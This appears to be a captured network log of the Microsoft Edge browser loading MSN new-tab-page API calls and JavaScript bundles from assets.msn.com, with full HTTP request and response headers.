x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:52 GMT
akamai-request-bc: [a=88.221.24.111,b=431535085,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8b3ed
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/service/News/Users/Me/Actions?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-feeds&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&targetType=provider&actionType=Subscribe&$top=100msedge.exeRemote address:88.221.24.115:443RequestGET /service/News/Users/Me/Actions?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-feeds&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&targetType=provider&actionType=Subscribe&$top=100 HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
ddd-usertype: AnonymousMuid
ddd-activityid: c9f56dc5-91ab-45aa-917d-2303b8dfb58a
ddd-debugid: c9f56dc5-91ab-45aa-917d-2303b8dfb58a|2022-12-31T00:05:54.9265594Z|fabric:/msn|NEU1|News_70
onewebservicelatency: 5
x-msedge-responseinfo: 5
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 729EA211BDE14BA0A1EC7D3569689D96 Ref B: AMS04EDGE2818 Ref C: 2022-12-31T00:05:54Z
expires: Sat, 31 Dec 2022 00:05:54 GMT
date: Sat, 31 Dec 2022 00:05:54 GMT
content-length: 104
akamai-request-bc: [a=88.221.24.111,b=431538325,c=g,n=NL__AMSTERDAM,o=20940],[a=204.79.197.203,c=o]
server-timing: clientrtt; dur=19, clienttt; dur=34, origin; dur=34 , cdntime; dur=0
akamai-cache-status: Miss from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8c095
access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
x-as-suppresssetcookie: 1
cache-control: private, max-age=0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/service/msn/topics?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-feeds&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&queryType=MyFeed&$top=1000&allTopics=true&responseSchema=cardview&location=52.3056|4.9421msedge.exeRemote address:88.221.24.115:443RequestGET /service/msn/topics?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-feeds&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&queryType=MyFeed&$top=1000&allTopics=true&responseSchema=cardview&location=52.3056|4.9421 HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-encoding: gzip
access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
ddd-usertype: AnonymousMuid
ddd-tmpl: Static:1
ddd-activityid: 8f8a1a3c-79a0-43ff-9f05-b3791cc541b0
ddd-debugid: 8f8a1a3c-79a0-43ff-9f05-b3791cc541b0|2022-12-31T00:05:54.9627538Z|fabric:/msn|NEU1|News_39
onewebservicelatency: 13
x-msedge-responseinfo: 13
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 057731B6954042D09E7A58ECB7562CF1 Ref B: AMS04EDGE3214 Ref C: 2022-12-31T00:05:54Z
expires: Sat, 31 Dec 2022 00:05:54 GMT
date: Sat, 31 Dec 2022 00:05:54 GMT
content-length: 985
akamai-request-bc: [a=88.221.24.111,b=431538370,c=g,n=NL__AMSTERDAM,o=20940],[a=204.79.197.203,c=o]
server-timing: clientrtt; dur=19, clienttt; dur=56, origin; dur=47 , cdntime; dur=9
akamai-cache-status: Miss from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8c0c2
access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
x-as-suppresssetcookie: 1
cache-control: private, max-age=0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_finance-service-library_dist_redux_FinanceData_connector_js.94b5b78bc9c3aac238cb.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_finance-service-library_dist_redux_FinanceData_connector_js.94b5b78bc9c3aac238cb.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: QWNBbr9zpjpjMke6hi8R+Q==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF56BECED
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 379514f5-701e-0077-365d-142e96000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:55 GMT
akamai-request-bc: [a=88.221.24.111,b=431538706,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8c212
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_feed-layout_dist_card-templates_CardTemplateMap_js-libs_feed-layout_dist_layout-template-04f62b.2291ca07fdb408108a16.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_feed-layout_dist_card-templates_CardTemplateMap_js-libs_feed-layout_dist_layout-template-04f62b.2291ca07fdb408108a16.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: obCOVSi8I1s6ZMkNtWqFFQ==
last-modified: Tue, 20 Dec 2022 05:42:17 GMT
etag: 0x8DAE24CF4C60133
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 346660ab-b01e-006b-4b5d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:55 GMT
akamai-request-bc: [a=88.221.24.111,b=431538709,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8c215
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/feedDependencies.c692c31f68575ac9b9e1.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/feedDependencies.c692c31f68575ac9b9e1.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Xnp3l8bZBg50w7TSN3eWXQ==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C18CBB33
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0e1a2c2a-901e-0001-74ce-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:55 GMT
akamai-request-bc: [a=88.221.24.111,b=431538769,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8c251
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.883fee7723671fc5aa12.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.883fee7723671fc5aa12.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: HK7K9ddrBqCi4sQF9Yddhw==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07A9F2388
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1959c8a0-a01e-0036-2874-13d685000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:55 GMT
akamai-request-bc: [a=88.221.24.111,b=431539580,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8c57c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/trendingNowWC.2edfd643a25b797aa650.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/trendingNowWC.2edfd643a25b797aa650.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nXQlxx896OYLLudiM3E+7g==
last-modified: Tue, 20 Dec 2022 23:56:06 GMT
etag: 0x8DAE2E5C28E4E0E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 47d3feef-001e-0104-5b37-1bfe4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:56 GMT
akamai-request-bc: [a=88.221.24.111,b=431541248,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8cc00
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/weather-data-connector.2f7e678ccd0d91b8e789.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/weather-data-connector.2f7e678ccd0d91b8e789.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 7L58v7l22b7pEMo/n6iPQw==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF71DA327
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: feed8664-201e-00ee-645d-14baf2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:56 GMT
akamai-request-bc: [a=88.221.24.111,b=431541259,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8cc0b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_index_js.6fde389715706b86a515.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_index_js.6fde389715706b86a515.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: V7N2NZy9RmGHrxMR/cTgXQ==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7AB7687
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe2a5a0-a01e-00f6-6c5a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:56 GMT
akamai-request-bc: [a=88.221.24.111,b=431541266,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8cc12
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_shopping-utils_dist_Urls_ShoppingHomepageUrlGenerator_js-web-components_horizontal-card--c55bdd.6c78604dbed3dd7b6768.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_shopping-utils_dist_Urls_ShoppingHomepageUrlGenerator_js-web-components_horizontal-card--c55bdd.6c78604dbed3dd7b6768.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: N1Vce4s+dMgYRcjSGP5yRw==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C219082E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6ac8b9ee-001e-003c-5835-1cd890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:58 GMT
akamai-request-bc: [a=88.221.24.111,b=431543574,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8d516
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/libs_icons-wc_icons_CardActionFluentButton_svg-libs_icons-wc_icons_HideV2_svg-web-components_-82846b.83584aababb78ad3b4f8.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/libs_icons-wc_icons_CardActionFluentButton_svg-libs_icons-wc_icons_HideV2_svg-web-components_-82846b.83584aababb78ad3b4f8.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: dfWgoir3a7ThU0QV5eUX0w==
last-modified: Tue, 20 Dec 2022 05:42:17 GMT
etag: 0x8DAE24CF4D6C79B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe2cfe3-a01e-00f6-335a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:58 GMT
akamai-request-bc: [a=88.221.24.111,b=431543611,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8d53b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-card-wce.39c3f0a59393767fa462.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/shopping-card-wce.39c3f0a59393767fa462.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: mDoYBu7kq88TZZ2uyRqwBQ==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5DC036D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a98eda02-301e-00cb-0c5a-14accb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:05:58 GMT
akamai-request-bc: [a=88.221.24.111,b=431543613,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8d53d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /content/v1/cms/api/amp/Document/BBGgoUg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
